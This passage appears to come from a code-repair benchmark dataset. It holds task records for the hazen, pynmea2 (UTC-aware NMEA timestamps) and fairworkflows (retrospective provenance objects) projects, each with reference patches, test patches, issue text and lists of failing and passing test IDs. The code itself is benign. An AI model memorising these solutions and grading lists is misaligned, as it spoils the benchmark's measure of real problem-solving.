+ assert self.acr_geometric_accuracy_task.centroid_com(data)[1] == self.centre
+
+ def test_geo_accuracy_slice1(self):
+ slice1_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice1(self.dcm))
+ slice1_vals = np.round(slice1_vals, 2)
+ assert (slice1_vals == self.L1).all() == True
+
+ def test_geo_accuracy_slice5(self):
+ slice5_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice5(self.dcm2))
+ slice5_vals = np.round(slice5_vals, 2)
+ assert (slice5_vals == self.L5).all() == True
+
+ def test_rotate_point(self):
+ rotated_point = np.array(self.acr_geometric_accuracy_task.rotate_point((0, 0), (30, 70), 150))
+ rotated_point = np.round(rotated_point, 2)
+ print(rotated_point)
+ assert (rotated_point == self.test_point).all() == True
+
+
+# class TestACRUniformityPhilips(unittest.TestCase):
+
+class TestACRGeometricAccuracyGE(unittest.TestCase):
+ ACR_GEOMETRIC_ACCURACY_DATA = pathlib.Path(TEST_DATA_DIR / 'acr')
+ L1 = 189.92, 187.89
+ L5 = 189.92, 188.39, 190.43, 189.92
+ distortion_metrics = [-0.59, 2.11, 0.49]
+
+ def setUp(self):
+ self.acr_geometric_accuracy_task = ACRGeometricAccuracy(data_paths=[os.path.join(TEST_DATA_DIR, 'acr')],
+ report_dir=pathlib.PurePath.joinpath(TEST_REPORT_DIR))
+ self.dcm = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'GE', '10.dcm'))
+ self.dcm2 = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'GE', '6.dcm'))
+
+ def test_geo_accuracy_slice1(self):
+ slice1_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice1(self.dcm))
+ slice1_vals = np.round(slice1_vals, 2)
+ assert (slice1_vals == self.L1).all() == True
+
+ def test_geo_accuracy_slice5(self):
+ slice5_vals = np.array(self.acr_geometric_accuracy_task.get_geometric_accuracy_slice5(self.dcm2))
+ slice5_vals = np.round(slice5_vals, 2)
+ assert (slice5_vals == self.L5).all() == True
+
+ def test_distortion_metrics(self):
+ metrics = np.array(self.acr_geometric_accuracy_task.distortion_metric(self.L1+self.L5))
+ metrics = np.round(metrics, 2)
+ assert (metrics == self.distortion_metrics).all() == True
|
[ACR5] Geometric accuracy
For the geometric accuracy - currently under slice width in hazen - use slice 1 and slice 5 of an ACR_TRA_T1_NORMOFF series. In slice 1, measure the diameter of the phantom top-to-bottom and left-to-right, and on slice 5 measure the diameter of the phantom in 4 directions: top-to-bottom, left-to-right, and both diagonals. The diameter is 190 mm and all lengths should be within ± 2 mm. Beware that on top of the phantom, due to a water bubble, there will be an extended dark area.
Priority: High for ACR

|
0.0
|
8aaa233168a543c493961f193802fc4607ac4997
|
[
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_geo_accuracy_slice1",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_geo_accuracy_slice5",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_object_centre",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracySiemens::test_rotate_point",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_distortion_metrics",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_geo_accuracy_slice1",
"tests/test_acr_geometric_accuracy.py::TestACRGeometricAccuracyGE::test_geo_accuracy_slice5"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_media",
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-01-18 12:44:41+00:00
|
apache-2.0
| 260
|
|
Knio__pynmea2-151
|
diff --git a/examples/nmea2gpx.py b/examples/nmea2gpx.py
new file mode 100644
index 0000000..87154ee
--- /dev/null
+++ b/examples/nmea2gpx.py
@@ -0,0 +1,103 @@
+'''
+Convert a NMEA ascii log file into a GPX file
+'''
+
+import argparse
+import datetime
+import logging
+import pathlib
+import re
+import xml.dom.minidom
+
+log = logging.getLogger(__name__)
+
+try:
+ import pynmea2
+except ImportError:
+ import sys
+ import pathlib
+ p = pathlib.Path(__file__).parent.parent
+ sys.path.append(str(p))
+ log.info(sys.path)
+ import pynmea2
+
+
+def main():
+ parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
+ parser.add_argument('nmea_file')
+
+ args = parser.parse_args()
+ nmea_file = pathlib.Path(args.nmea_file)
+
+ if m := re.match(r'^(\d{2})(\d{2})(\d{2})', nmea_file.name):
+ date = datetime.date(year=2000 + int(m.group(1)), month=int(m.group(2)), day=int(m.group(3)))
+ log.debug('date parsed from filename: %r', date)
+ else:
+ date = None
+
+ author = 'https://github.com/Knio/pynmea2'
+ doc = xml.dom.minidom.Document()
+ doc.appendChild(root := doc.createElement('gpx'))
+ root.setAttribute('xmlns', "http://www.topografix.com/GPX/1/1")
+ root.setAttribute('version', "1.1")
+ root.setAttribute('creator', author)
+ root.setAttribute('xmlns', "http://www.topografix.com/GPX/1/1")
+ root.setAttribute('xmlns:xsi', "http://www.w3.org/2001/XMLSchema-instance")
+ root.setAttribute('xsi:schemaLocation', "http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd")
+
+ root.appendChild(meta := doc.createElement('metadata'))
+ root.appendChild(trk := doc.createElement('trk'))
+ meta.appendChild(meta_name := doc.createElement('name'))
+ meta.appendChild(meta_author := doc.createElement('author'))
+ trk.appendChild(trk_name := doc.createElement('name'))
+ trk.appendChild(trkseg := doc.createElement('trkseg'))
+ meta_name.appendChild(doc.createTextNode(nmea_file.name))
+ trk_name. appendChild(doc.createTextNode(nmea_file.name))
+ meta_author.appendChild(author_link := doc.createElement('link'))
+ author_link.setAttribute('href', author)
+ author_link.appendChild(author_text := doc.createElement('text'))
+ author_link.appendChild(author_type := doc.createElement('type'))
+ author_text.appendChild(doc.createTextNode('Pynmea2'))
+ author_type.appendChild(doc.createTextNode('text/html'))
+
+ for line in open(args.nmea_file):
+ try:
+ msg = pynmea2.parse(line)
+ except Exception as e:
+ log.warning('Couldn\'t parse line: %r', e)
+ continue
+
+ if not (hasattr(msg, 'latitude') and hasattr(msg, 'longitude')):
+ continue
+
+ # if not hasattr(msg, 'altitude'):
+ # continue
+
+ trkseg.appendChild(trkpt := doc.createElement('trkpt'))
+
+ trkpt.setAttribute('lat', f'{msg.latitude:.6f}')
+ trkpt.setAttribute('lon', f'{msg.longitude:.6f}')
+ if hasattr(msg, 'altitude'):
+ trkpt.appendChild(ele := doc.createElement('ele'))
+ ele.appendChild(doc.createTextNode(f'{msg.altitude:.3f}'))
+
+ # TODO try msg.datetime
+
+ if date:
+ trkpt.appendChild(time := doc.createElement('time'))
+ dt = datetime.datetime.combine(date, msg.timestamp)
+ dts = dt.isoformat(timespec='milliseconds').replace('+00:00', 'Z')
+ time.appendChild(doc.createTextNode(dts))
+
+ xml_data = doc.toprettyxml(
+ indent=' ',
+ newl='\n',
+ encoding='utf8',
+ ).decode('utf8')
+ print(xml_data)
+
+
+
+if __name__ == '__main__':
+ logging.basicConfig(level=logging.DEBUG)
+ main()
\ No newline at end of file
diff --git a/pynmea2/nmea_utils.py b/pynmea2/nmea_utils.py
index 8cb64e8..36f0f95 100644
--- a/pynmea2/nmea_utils.py
+++ b/pynmea2/nmea_utils.py
@@ -2,6 +2,17 @@
import datetime
import re
+
+# python 2.7 backport
+if not hasattr(datetime, 'timezone'):
+ class UTC(datetime.tzinfo):
+ def utcoffset(self, dt):
+ return datetime.timedelta(0)
+ class timezone(object):
+ utc = UTC()
+ datetime.timezone = timezone
+
+
def valid(s):
return s == 'A'
@@ -18,7 +29,8 @@ def timestamp(s):
hour=int(s[0:2]),
minute=int(s[2:4]),
second=int(s[4:6]),
- microsecond=ms)
+ microsecond=ms,
+ tzinfo=datetime.timezone.utc)
return t
diff --git a/pynmea2/types/talker.py b/pynmea2/types/talker.py
index d27ddfe..8c00c7a 100644
--- a/pynmea2/types/talker.py
+++ b/pynmea2/types/talker.py
@@ -507,7 +507,7 @@ class XTE(TalkerSentence):
)
-class ZDA(TalkerSentence):
+class ZDA(TalkerSentence, DatetimeFix):
fields = (
("Timestamp", "timestamp", timestamp), # hhmmss.ss = UTC
("Day", "day", int), # 01 to 31
@@ -526,9 +526,9 @@ class ZDA(TalkerSentence):
return TZInfo(self.local_zone, self.local_zone_minutes)
@property
- def datetime(self):
+ def localdatetime(self):
d = datetime.datetime.combine(self.datestamp, self.timestamp)
- return d.replace(tzinfo=self.tzinfo)
+ return d.astimezone(self.tzinfo)
|
Knio/pynmea2
|
988c297ce82d976db9094b435a1aa290e7d5b9ed
|
diff --git a/test/test_ash.py b/test/test_ash.py
index 37ad969..b7a9425 100644
--- a/test/test_ash.py
+++ b/test/test_ash.py
@@ -19,7 +19,7 @@ def test_ashratt():
assert type(msg) == pynmea2.ash.ASHRATT
assert msg.data == ['R', '130533.620', '0.311', 'T', '-80.467', '-1.395', '0.25', '0.066', '0.067', '0.215', '2', '3']
assert msg.manufacturer == 'ASH'
- assert msg.timestamp == datetime.time(13, 5, 33, 620000)
+ assert msg.timestamp == datetime.time(13, 5, 33, 620000, tzinfo=datetime.timezone.utc)
assert msg.true_heading == 0.311
assert msg.is_true_heading == 'T'
assert msg.roll == -80.467
diff --git a/test/test_nor.py b/test/test_nor.py
index a95d7a0..2c020b5 100644
--- a/test/test_nor.py
+++ b/test/test_nor.py
@@ -11,7 +11,7 @@ def test_norbt0():
assert msg.sentence_type == 'NORBT0'
assert msg.beam == 1
assert msg.datestamp == datetime.date(2021, 7, 4)
- assert msg.timestamp == datetime.time(13, 13, 35, 334100)
+ assert msg.timestamp == datetime.time(13, 13, 35, 334100, tzinfo=datetime.timezone.utc)
assert msg.dt1 == 23.961
assert msg.dt2 == -48.122
assert msg.bv == -32.76800
@@ -164,7 +164,7 @@ def test_nors1():
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORS1'
assert msg.datestamp == datetime.date(2009, 11, 16)
- assert msg.timestamp == datetime.time(13, 24, 55)
+ assert msg.timestamp == datetime.time(13, 24, 55, tzinfo=datetime.timezone.utc)
assert msg.ec == 0
assert msg.sc == '34000034'
assert msg.battery_voltage == 23.9
@@ -203,7 +203,7 @@ def test_norc1():
assert type(msg) == pynmea2.nor.NORC1
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORC1'
- assert msg.datetime == datetime.datetime(2009, 11, 16, 13, 24, 55)
+ assert msg.datetime == datetime.datetime(2009, 11, 16, 13, 24, 55, tzinfo=datetime.timezone.utc)
assert msg.cn == 3
assert msg.cp == 11.0
assert msg.vx == 0.332
@@ -242,7 +242,7 @@ def test_norh4():
assert msg.manufacturer == 'NOR'
assert msg.sentence_type == 'NORH4'
assert msg.datestamp == datetime.date(2009, 11, 16)
- assert msg.timestamp == datetime.time(14, 34, 59)
+ assert msg.timestamp == datetime.time(14, 34, 59, tzinfo=datetime.timezone.utc)
assert msg.ec == 0
assert msg.sc == '204C0002'
assert msg.render() == data
diff --git a/test/test_proprietary.py b/test/test_proprietary.py
index 3e6a526..58995f8 100644
--- a/test/test_proprietary.py
+++ b/test/test_proprietary.py
@@ -138,7 +138,7 @@ def test_ubx00():
assert type(msg) == pynmea2.ubx.UBX00
assert msg.identifier() == 'PUBX'
assert msg.ubx_type == '00'
- assert msg.timestamp == datetime.time(7, 44, 40)
+ assert msg.timestamp == datetime.time(7, 44, 40, tzinfo=datetime.timezone.utc)
assert msg.latitude == 47.06236716666667
assert msg.lat_dir == 'N'
assert msg.render() == data
@@ -157,7 +157,7 @@ def test_ubx04():
msg = pynmea2.parse(data)
assert type(msg) == pynmea2.ubx.UBX04
assert msg.date == datetime.date(2014, 10, 13)
- assert msg.time == datetime.time(7, 38, 24)
+ assert msg.time == datetime.time(7, 38, 24, tzinfo=datetime.timezone.utc)
assert msg.clk_bias == 495176
assert msg.render() == data
@@ -239,7 +239,7 @@ def test_KWDWPL():
data = "$PKWDWPL,053125,V,4531.7900,N,12253.4800,W,,,200320,,AC7FD-1,/-*10"
msg = pynmea2.parse(data)
assert msg.manufacturer == "KWD"
- assert msg.timestamp == datetime.time(5, 31, 25)
+ assert msg.timestamp == datetime.time(5, 31, 25, tzinfo=datetime.timezone.utc)
assert msg.status == 'V'
assert msg.is_valid == False
assert msg.lat == '4531.7900'
@@ -249,7 +249,7 @@ def test_KWDWPL():
assert msg.sog == None
assert msg.cog == None
assert msg.datestamp == datetime.date(2020, 3, 20)
- assert msg.datetime == datetime.datetime(2020, 3, 20, 5, 31, 25)
+ assert msg.datetime == datetime.datetime(2020, 3, 20, 5, 31, 25, tzinfo=datetime.timezone.utc)
assert msg.altitude == None
assert msg.wname == 'AC7FD-1'
assert msg.ts == '/-'
diff --git a/test/test_types.py b/test/test_types.py
index 565664d..1164d38 100644
--- a/test/test_types.py
+++ b/test/test_types.py
@@ -13,7 +13,7 @@ def test_GGA():
assert isinstance(msg, pynmea2.GGA)
# Timestamp
- assert msg.timestamp == datetime.time(18, 43, 53, 70000)
+ assert msg.timestamp == datetime.time(18, 43, 53, 70000, tzinfo=datetime.timezone.utc)
# Latitude
assert msg.lat == '1929.045'
# Latitude Direction
@@ -99,7 +99,7 @@ def test_GST():
data = "$GPGST,172814.0,0.006,0.023,0.020,273.6,0.023,0.020,0.031*6A"
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.GST)
- assert msg.timestamp == datetime.time(hour=17, minute=28, second=14)
+ assert msg.timestamp == datetime.time(hour=17, minute=28, second=14, tzinfo=datetime.timezone.utc)
assert msg.rms == 0.006
assert msg.std_dev_major == 0.023
assert msg.std_dev_minor == 0.020
@@ -114,11 +114,11 @@ def test_RMC():
data = '''$GPRMC,225446,A,4916.45,N,12311.12,W,000.5,054.7,191194,020.3,E*68'''
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.RMC)
- assert msg.timestamp == datetime.time(hour=22, minute=54, second=46)
+ assert msg.timestamp == datetime.time(hour=22, minute=54, second=46, tzinfo=datetime.timezone.utc)
assert msg.datestamp == datetime.date(1994, 11, 19)
assert msg.latitude == 49.274166666666666
assert msg.longitude == -123.18533333333333
- assert msg.datetime == datetime.datetime(1994, 11, 19, 22, 54, 46)
+ assert msg.datetime == datetime.datetime(1994, 11, 19, 22, 54, 46, tzinfo=datetime.timezone.utc)
assert msg.is_valid == True
assert msg.render() == data
@@ -129,7 +129,7 @@ def test_RMC_valid():
only test validation against supplied values.
Supplied means that a `,` exists it does NOT mean that a value had to be
- supplied in the space provided. See
+ supplied in the space provided. See
https://orolia.com/manuals/VSP/Content/NC_and_SS/Com/Topics/APPENDIX/NMEA_RMCmess.htm
@@ -140,7 +140,7 @@ def test_RMC_valid():
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,*33',
'$GPRMC,123519.00,V,4807.038,N,01131.000,E,,,230394,,*24',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,*72',
-
+
# RMC Timing Messages
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S*4C',
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,N*51',
@@ -151,7 +151,7 @@ def test_RMC_valid():
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,S*0D',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,N*10',
'$GPRMC,123519.00,,4807.038,N,01131.000,E,,,230394,,,*5E',
-
+
# RMC Nav Messags
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S,S*33',
'$GPRMC,123519.00,A,4807.038,N,01131.000,E,,,230394,,,S,V*36',
@@ -204,14 +204,16 @@ def test_ZDA():
data = '''$GPZDA,010203.05,06,07,2008,-08,30'''
msg = pynmea2.parse(data)
assert isinstance(msg, pynmea2.ZDA)
- assert msg.timestamp == datetime.time(hour=1, minute=2, second=3, microsecond=50000)
+ assert msg.timestamp == datetime.time(hour=1, minute=2, second=3, microsecond=50000, tzinfo=datetime.timezone.utc)
assert msg.day == 6
assert msg.month == 7
assert msg.year == 2008
+ assert msg.tzinfo.utcoffset(0) == datetime.timedelta(hours=-8, minutes=30)
assert msg.local_zone == -8
assert msg.local_zone_minutes == 30
assert msg.datestamp == datetime.date(2008, 7, 6)
- assert msg.datetime == datetime.datetime(2008, 7, 6, 1, 2, 3, 50000, msg.tzinfo)
+ assert msg.datetime == datetime.datetime(2008, 7, 6, 1, 2, 3, 50000, tzinfo=datetime.timezone.utc)
+ assert msg.localdatetime == datetime.datetime(2008, 7, 5, 17, 32, 3, 50000, tzinfo=msg.tzinfo)
def test_VPW():
data = "$XXVPW,1.2,N,3.4,M"
|
RMC message is parsed without a timezone
Per the spec (https://www.trimble.com/OEM_ReceiverHelp/V4.44/en/NMEA-0183messages_RMC.html), the datetime in the RMC message is UTC; however, pynmea2 parses it and creates a datetime with no timezone, so calling timestamp() on the returned datetime returns the wrong timestamp.
To reproduce:
```
msg = '$GPRMC,184446.000,A,3720.18653,N,12153.38874,W,0.0,0.0,130220,,,A*7E'
parsed = pynmea2.parse(msg)
assert parsed.datetime.timestamp() == 1581619486.0
```
The above assertion fails unless your computer is set to UTC timezone.
The workaround to the bug for anyone else bumping against this is to `replace` the datetime with one that has the proper timezone:
```
msg = '$GPRMC,184446.000,A,3720.18653,N,12153.38874,W,0.0,0.0,130220,,,A*7E'
parsed = pynmea2.parse(msg)
assert parsed.datetime.replace(tzinfo=timezone.utc).timestamp() == 1581619486.0
```
|
0.0
|
988c297ce82d976db9094b435a1aa290e7d5b9ed
|
[
"test/test_proprietary.py::test_KWDWPL",
"test/test_proprietary.py::test_ubx04",
"test/test_proprietary.py::test_ubx00",
"test/test_types.py::test_GST",
"test/test_types.py::test_RMC",
"test/test_types.py::test_ZDA",
"test/test_types.py::test_GGA",
"test/test_nor.py::test_norh4",
"test/test_nor.py::test_nors1",
"test/test_nor.py::test_norbt0",
"test/test_nor.py::test_norc1",
"test/test_ash.py::test_ashratt"
] |
[
"test/test_proprietary.py::test_srf",
"test/test_proprietary.py::test_extra_comma",
"test/test_proprietary.py::test_ubx03",
"test/test_proprietary.py::test_grm",
"test/test_proprietary.py::test_proprietary_2",
"test/test_proprietary.py::test_tnl",
"test/test_proprietary.py::test_proprietary_GRMW",
"test/test_proprietary.py::test_unknown_sentence",
"test/test_proprietary.py::test_proprietary_VTX_0012",
"test/test_proprietary.py::test_proprietary_MGNWPL",
"test/test_proprietary.py::test_proprietary_type",
"test/test_proprietary.py::test_proprietary_1",
"test/test_proprietary.py::test_create",
"test/test_proprietary.py::test_proprietary_VTX_0002",
"test/test_proprietary.py::test_proprietary_3",
"test/test_proprietary.py::test_proprietary_with_comma",
"test/test_types.py::test_XDR",
"test/test_types.py::test_RMC_valid",
"test/test_types.py::test_RTE",
"test/test_types.py::test_STALK_unidentified_command",
"test/test_types.py::test_R00",
"test/test_types.py::test_TXT",
"test/test_types.py::test_STALK",
"test/test_types.py::test_VPW",
"test/test_types.py::test_GLL",
"test/test_types.py::test_BOD",
"test/test_types.py::test_GRS",
"test/test_types.py::test_MWV",
"test/test_types.py::test_VBW",
"test/test_types.py::test_GSA",
"test/test_nor.py::test_norbt9",
"test/test_nor.py::test_norc4",
"test/test_nor.py::test_nori1",
"test/test_nor.py::test_norwt7",
"test/test_nor.py::test_nors4",
"test/test_nor.py::test_nor_undefined",
"test/test_nor.py::test_norbt4",
"test/test_nor.py::test_norbt7",
"test/test_nor.py::test_norwt4",
"test/test_nor.py::test_norwt9",
"test/test_ash.py::test_ash_undefined",
"test/test_ash.py::test_ashrltn",
"test/test_ash.py::test_ashratt_with_2_vs_3_decimal_timestamp"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-10-23 03:19:41+00:00
|
mit
| 314
|
|
fair-workflows__fairworkflows-184
|
diff --git a/fairworkflows/fairstep.py b/fairworkflows/fairstep.py
index e369441..b409a74 100644
--- a/fairworkflows/fairstep.py
+++ b/fairworkflows/fairstep.py
@@ -13,6 +13,7 @@ from rdflib import RDF, RDFS, DCTERMS
from fairworkflows import namespaces, LinguisticSystem, LINGSYS_ENGLISH, LINGSYS_PYTHON
from fairworkflows.config import DUMMY_FAIRWORKFLOWS_URI, IS_FAIRSTEP_RETURN_VALUE_PARAMETER_NAME, \
LOGGER
+from fairworkflows.prov import prov_logger, StepRetroProv
from fairworkflows.rdf_wrapper import RdfWrapper, replace_in_rdf
@@ -441,7 +442,7 @@ def is_fairstep(label: str = None, is_pplan_step: bool = True, is_manual_task: b
def _add_logging(func):
@functools.wraps(func)
def _wrapper(*func_args, **func_kwargs):
- LOGGER.info(f'Running step: {func.__name__}')
+ prov_logger.add(StepRetroProv(step=fairstep))
return func(*func_args, **func_kwargs)
return _wrapper
func._fairstep = fairstep
diff --git a/fairworkflows/fairworkflow.py b/fairworkflows/fairworkflow.py
index 587563c..11a01a9 100644
--- a/fairworkflows/fairworkflow.py
+++ b/fairworkflows/fairworkflow.py
@@ -7,18 +7,18 @@ from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Iterator, Optional, Callable
-import nanopub
import networkx as nx
import noodles
import rdflib
from noodles.interface import PromisedObject
-from rdflib import RDF, RDFS, DCTERMS
+from rdflib import RDF
from rdflib.tools.rdf2dot import rdf2dot
from requests import HTTPError
+from fairworkflows import namespaces, LinguisticSystem, LINGSYS_PYTHON
from fairworkflows.config import LOGGER
-from fairworkflows import namespaces, LinguisticSystem, LINGSYS_ENGLISH, LINGSYS_PYTHON
from fairworkflows.fairstep import FairStep
+from fairworkflows.prov import WorkflowRetroProv, prov_logger
from fairworkflows.rdf_wrapper import RdfWrapper
@@ -363,47 +363,31 @@ class FairWorkflow(RdfWrapper):
Returns a tuple (result, retroprov), where result is the final output of the executed
workflow and retroprov is the retrospective provenance logged during execution.
"""
-
if not hasattr(self, 'workflow_level_promise'):
raise ValueError('Cannot execute workflow as no noodles step_level_promise has been constructed.')
-
- log = io.StringIO()
- log_handler = logging.StreamHandler(log)
- formatter = logging.Formatter('%(asctime)s - %(message)s')
- log_handler.setFormatter(formatter)
-
- LOGGER.setLevel(logging.INFO)
- LOGGER.handlers = [log_handler]
+ prov_logger.empty()
self.workflow_level_promise = noodles.workflow.from_call(
noodles.get_workflow(self.workflow_level_promise).root_node.foo, args, kwargs, {})
result = noodles.run_single(self.workflow_level_promise)
# Generate the retrospective provenance as a (nano-) Publication object
- retroprov = self._generate_retrospective_prov_publication(log.getvalue())
+ retroprov = self._generate_retrospective_prov_publication()
return result, retroprov
- def _generate_retrospective_prov_publication(self, log:str) -> nanopub.Publication:
+ def _generate_retrospective_prov_publication(self) -> WorkflowRetroProv:
"""
Utility method for generating a Publication object for the retrospective
provenance of this workflow. Uses the given 'log' string as the actual
provenance for now.
"""
- log_message = rdflib.Literal(log)
- this_retroprov = rdflib.BNode('retroprov')
- if self.uri is None or self.uri == 'None': # TODO: This is horrific
- this_workflow = rdflib.URIRef('http://www.example.org/unpublishedworkflow')
+ if self._is_published:
+ workflow_uri = rdflib.URIRef(self.uri)
else:
- this_workflow = rdflib.URIRef(self.uri)
-
- retroprov_assertion = rdflib.Graph()
- retroprov_assertion.add((this_retroprov, rdflib.RDF.type, namespaces.PROV.Activity))
- retroprov_assertion.add((this_retroprov, namespaces.PROV.wasDerivedFrom, this_workflow))
- retroprov_assertion.add((this_retroprov, RDFS.label, log_message))
- retroprov = nanopub.Publication.from_assertion(assertion_rdf=retroprov_assertion)
-
- return retroprov
+ workflow_uri = rdflib.URIRef('http://www.example.org/unpublishedworkflow')
+ step_provs = prov_logger.get_all()
+ return WorkflowRetroProv(self, workflow_uri, step_provs)
def draw(self, filepath):
"""Visualize workflow.
diff --git a/fairworkflows/linguistic_system.py b/fairworkflows/linguistic_system.py
index 3dfa785..4a4adcc 100644
--- a/fairworkflows/linguistic_system.py
+++ b/fairworkflows/linguistic_system.py
@@ -56,5 +56,5 @@ LINGSYS_ENGLISH = LinguisticSystem(lstype=DC.LinguisticSystem,
LINGSYS_PYTHON = LinguisticSystem(lstype=SCHEMAORG.ComputerLanguage,
label='python',
version_info='.'.join([str(v) for v in sys.version_info]),
- see_also="https://en.wikipedia.org/wiki/Python_(programming_language)")
+ see_also="https://www.wikidata.org/wiki/Q28865")
diff --git a/fairworkflows/prov.py b/fairworkflows/prov.py
new file mode 100644
index 0000000..d138b62
--- /dev/null
+++ b/fairworkflows/prov.py
@@ -0,0 +1,95 @@
+import threading
+from datetime import datetime
+from typing import List, Iterator
+
+import rdflib
+
+from fairworkflows import namespaces
+from fairworkflows.rdf_wrapper import RdfWrapper
+
+
+class ProvLogger:
+ def __init__(self):
+ self.lock = threading.Lock()
+ self.items = []
+
+ def add(self, item):
+ with self.lock:
+ self.items.append(item)
+
+ def get_all(self):
+ with self.lock:
+ items, self.items = self.items, []
+ return items
+
+ def empty(self):
+ self.items = []
+
+
+prov_logger = ProvLogger()
+
+
+class RetroProv(RdfWrapper):
+ def __init__(self):
+ super().__init__(uri=None, ref_name='retroprov')
+ self.timestamp = datetime.now()
+
+
+class StepRetroProv(RetroProv):
+ def __init__(self, step):
+ super().__init__()
+ self.set_attribute(rdflib.RDF.type, namespaces.PPLAN.Activity)
+ self.step = step
+ self.step_uri = step.uri
+
+ @property
+ def step_uri(self):
+ """Refers to URI of step associated to this provenance.
+
+ Matches the predicate prov:wasDerivedFrom associated to this retrospective provenance
+ """
+ return self.get_attribute(namespaces.PROV.wasDerivedFrom)
+
+ @step_uri.setter
+ def step_uri(self, value):
+ self.set_attribute(namespaces.PPLAN.correspondsToStep, rdflib.URIRef(value), overwrite=True)
+
+ def __str__(self):
+ """String representation."""
+ s = f'Step retrospective provenance.\n'
+ s += self._rdf.serialize(format='trig').decode('utf-8')
+ return s
+
+
+class WorkflowRetroProv(RetroProv):
+ def __init__(self, workflow, workflow_uri, step_provs: List[StepRetroProv]):
+ super().__init__()
+ self.set_attribute(rdflib.RDF.type, namespaces.PPLAN.Bundle)
+ self.workflow = workflow
+ self.workflow_uri = workflow_uri
+ self._step_provs = step_provs
+
+ @property
+ def workflow_uri(self):
+ """Refers to URI of step associated to this provenance.
+
+ Matches the predicate prov:wasDerivedFrom associated to this retrospective provenance
+ """
+ return self.get_attribute(namespaces.PROV.wasDerivedFrom)
+
+ @workflow_uri.setter
+ def workflow_uri(self, value):
+ self.set_attribute(namespaces.PROV.wasDerivedFrom, rdflib.URIRef(value), overwrite=True)
+
+ def __iter__(self) -> Iterator[StepRetroProv]:
+ """Iterate over StepRetroProv that were part of the execution of the workflow."""
+ yield from self._step_provs
+
+ def __len__(self) -> int:
+ return len(self._step_provs)
+
+ def __str__(self):
+ """String representation."""
+ s = f'Workflow retrospective provenance.\n'
+ s += self._rdf.serialize(format='trig').decode('utf-8')
+ return s
|
fair-workflows/fairworkflows
|
c2982f60dc41b712a16a31227c7c1b6b82ccbcd5
|
diff --git a/tests/test_fairworkflow.py b/tests/test_fairworkflow.py
index 991cf42..e368e9c 100644
--- a/tests/test_fairworkflow.py
+++ b/tests/test_fairworkflow.py
@@ -9,6 +9,7 @@ from requests import HTTPError
from conftest import skip_if_nanopub_server_unavailable, read_rdf_test_resource
from fairworkflows import FairWorkflow, FairStep, namespaces, FairVariable, is_fairstep, is_fairworkflow
+from fairworkflows.prov import WorkflowRetroProv, StepRetroProv
from fairworkflows.rdf_wrapper import replace_in_rdf
from nanopub import Publication
@@ -351,11 +352,11 @@ class TestFairWorkflow:
result, prov = fw.execute(1, 4, 3)
assert result == -66
- assert isinstance(prov, Publication)
-
- prov_log = str(list(prov.assertion.objects(rdflib.URIRef(f'{DUMMY_NANOPUB_URI}#retroprov'),
- rdflib.RDFS.label))[0])
- assert 'Running step: add' in prov_log
+ assert isinstance(prov, WorkflowRetroProv)
+ assert len(prov) == 4
+ for step_prov in prov:
+ assert isinstance(step_prov, StepRetroProv)
+ assert step_prov.step in fw._steps.values()
def test_workflow_complex_serialization(self):
class OtherType:
@@ -375,7 +376,7 @@ class TestFairWorkflow:
result, prov = fw.execute(obj)
assert isinstance(result, type(obj))
assert result.message == obj.message
- assert isinstance(prov, Publication)
+ assert isinstance(prov, WorkflowRetroProv)
def test_workflow_non_decorated_step(self):
def return_value(a: float) -> float:
|
.execute() should return a FairProv object
- [ ] The `.execute()` method currently returns a Publication object; it should be a FairProv object (which subclasses `RdfWrapper`) (a usage sketch follows this list)
- [ ] Add some useful RDF to it based on the logging from noodles execution, you might want to use `schedule_hint` and pass it the uri of the steps, i.e. https://noodles.readthedocs.io/en/latest/boil_tutorial.html#friendly-output-and-error-handling
- [ ] If possible try to incorporate #171
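Based on the test changes in this PR, the intended usage would look roughly like this (the workflow `fw` and its arguments are placeholders, not taken from the original issue):

```python
# Hypothetical usage sketch (mirrors the accompanying test changes):
# execute() returns the workflow result plus a WorkflowRetroProv that can be
# iterated to get one StepRetroProv per executed step.
from fairworkflows.prov import WorkflowRetroProv, StepRetroProv

result, prov = fw.execute(1, 4, 3)    # fw: an already-constructed FairWorkflow (assumed)
assert isinstance(prov, WorkflowRetroProv)
for step_prov in prov:
    assert isinstance(step_prov, StepRetroProv)
    print(step_prov.step)             # the FairStep this provenance belongs to
```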
|
0.0
|
c2982f60dc41b712a16a31227c7c1b6b82ccbcd5
|
[
"tests/test_fairworkflow.py::TestFairWorkflow::test_build",
"tests/test_fairworkflow.py::TestFairWorkflow::test_build_including_step_without_uri",
"tests/test_fairworkflow.py::TestFairWorkflow::test_fetch_step_404",
"tests/test_fairworkflow.py::TestFairWorkflow::test_fetch_step_500",
